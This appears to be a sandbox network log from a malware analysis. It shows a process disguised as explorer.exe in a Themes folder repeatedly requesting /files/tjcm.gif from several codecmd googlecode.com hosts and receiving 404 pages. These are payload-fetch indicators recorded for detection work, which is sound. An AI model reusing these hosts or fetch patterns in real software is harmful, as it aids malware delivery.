                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:28.334518909 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      127192.168.2.549841108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:28.738028049 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:29.399188042 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:29 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:29.399209976 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      128192.168.2.549842108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:29.847960949 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:30.562628984 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:30 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:30.562711000 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      129192.168.2.54984374.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:30.960019112 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:31.666218996 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:31 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:31.666353941 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      130192.168.2.549844108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:32.135848045 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:32.858771086 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:32 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:32.859172106 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      131192.168.2.549845108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:33.291513920 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:33.997230053 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:33 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:33.997255087 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      132192.168.2.54984674.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:34.319945097 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:35.049736023 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:34 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:35.050368071 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      133192.168.2.549847108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:35.436508894 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:36.164529085 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:36 GMT
